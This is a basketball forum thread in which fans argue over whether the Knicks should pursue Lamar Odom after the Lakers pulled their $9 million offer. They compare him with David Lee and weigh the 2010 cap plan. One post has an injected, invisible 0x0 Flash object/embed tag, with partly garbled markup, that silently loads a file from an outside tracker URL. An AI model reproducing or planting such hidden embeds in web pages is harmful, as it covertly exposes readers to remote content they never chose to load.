Knicks should hunt down Lamar Odom

metrocard

Legend
Jerry Buss has followed through with his threat and has removed the $9 million offer that the Lakers put to Lamar Odom after the champion forward did not respond, the L.A. Times is reporting.

Buss grew upset and broke off all negotiations after the offer was reportedly on the table for over a week, and he heard nothing back either way.

"Yes, we have taken the deal off the table," Lakers public relations director John Black said. "Talks have broken down for the time being."

Black was asked if talks could resume in the future.

"That's within the realm of possibility," he said.

Lakers team officials, who were not authorized to speak about the negotiations, said Buss offered Odom a deal for $9 million a season for four years at $36 million, or $10 million a season over three years for a total of $30 million.

Odom and his agent, Jeff Schwartz, were looking for $10 million a year over five seasons.

I rather have Odom over Lee

Odom is only 4 years older than lee, but with all star talent.
Odom always been in systems that never utilize his ability to max potential.
This is the system for him

Duhon 6"2
Gallinari 6"10
Odom 6"10
Hill 6"11
Milicic 7"1

Biggest line up of all time.

Odom can play inside and out...excellent passer/rebounder...would really compliment us a lot.

A passing core of Duhon/Gallinari/Odom would be ideal...especially since Duhon can't have that many responsibilities with his inabilities and Odom will take pressure of the ball.

Odom is a NY dude...we have zero NY dudes on our roster which is lame. Chicago has Derrick Rose. I want someone we can look up to.

Odom is a NBA champion

nyk_nyk

All Star

Duhon 6"2
Gallinari 6"10
Odom 6"10
Hill 6"11
Milicic 7"1

Odom can play inside and out...excellent passer/rebounder...would really compliment us a lot.

A passing core of Duhon/Gallinari/Odom would be ideal...especially since Duhon can't have that many responsibilities with his inabilities and Odom will take pressure of the ball.

Odom is a NY dude...we have zero NY dudes on our roster which is lame. Chicago has Derrick Rose. I want someone we can look up to.

Odom is a NBA champion

Not gonna happen. The offer is off the table for now but Lakers need odom since Ariza is gone. I fully expect Odom to take the 9 mil offered to him once its back on the table.

Odom is good but not worth sacrificing the 2010 plan.

We already had a NY dude and you see how that worked out.

smokes

Huge Member
They replaced Ariza with Artest and Odom is roughly equal to Ariza yet wants double the size of contracts they got.

LJ4ptplay

Starter
Lee is asking $10 mil per year. Odom wants $10 mil per year. Why not get Odom for the same amount. He's a much better player and the perfect PF for D'Antoni's system. With Artest, the Lakers don't really need Odom. Signing Lee affects the 2010 plan too.

PG-Duhon
SG-Chandler
SF-Gallinari
PF-Odom
C-Milicic

I don't see Hill starting at Center yet. He needs a lot of work. And I don't trust Curry. He's disappointed me too many times to give him the benefit of the doubt.

smokes

Huge Member
Signing Odom will affect the 2010 plan too, he wants 10 mill for 5 years.

Signing Lee doesn't have to, no one wants him, just give him the qualifying job done.

I would prefer Odom though without a doubt.

On Odom

Duhon 6"2
Gallinari 6"10
Odom 6"10
Hill 6"11
Milicic 7"1

That might be the 'biggest lineup of all time', however, as I have seen, the NBA has changed and 'big lineups' do not necessarily mean greater success. At times, I agree, it could be tough for teams to match up against big lineups. However, if a team puts a small lineup out there, chances are they will be getting more fast break points, transition points, and free throws because smaller guys have the ability to blow past defenders and/or draw fouls. I definetly agree Odom would be a good fit, only problem is that he is seeking a multi-year contract, and we all how much Donnie and Co. don't like that idea. It will be interesting to see how this pans out, and I would think the Knicks are more entertained by Boozer's 1 year than Odom's Multi Year Deal

latiger12

Rookie
Not gonna happen. The offer is off the table for now but Lakers need odom since Ariza is gone. I fully expect Odom to take the 9 mil offered to him once its back on the table.

Odom is good but not worth sacrificing the 2010 plan.

We already had a NY dude and you see how that worked out.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Not gonna happen. We need to pass on this trade and plan for 2010.

CoolClyde

does not compute: plan 2010

<<...Buss offered Odom a deal for $9 million a season for four years at $36 million, or $10 million a season over three years for a total of $30 million.
Odom and his agent, Jeff Schwartz, were looking for $10 million a year over five seasons.>>

how can we go after a free agent who turned down $10M/year for 3 years from the world champs? this does not fit into plan 2010, so why bring it up?
this thread is a waste of time and breath.

Scribbles

Rotation player
Lamar Odom is nice. He's more of a hustle player now than David Lee. (Anyone notice how lazy D. Lee is now that he put on some lbs? He doesn't dive for the ball anymore)

Odom can run the floor with ease, can dribble pretty swell for a big man, has post up moves (something Lee doesn't have), has a jumper (something Lee doesn't have) and is a good not great defensive stance (something Lee doesn't have).

So it's quite easy to say Odom is an obvious upgrade over David Lee.

Plus he's a tenacious player, he's cut from the same cloth Artest is cut from.

My Oakman wisdom is tingling.

Shhhhoooottt, I say make a run for him.

Been saying that prior to FA.

dave2138

Rotation player
at this point any signing that takes away playing time from Hill and Gallinari is a bad one. I don't even think signing Odom is at all possible unless he takes the MLE which he won't..so why bring it up?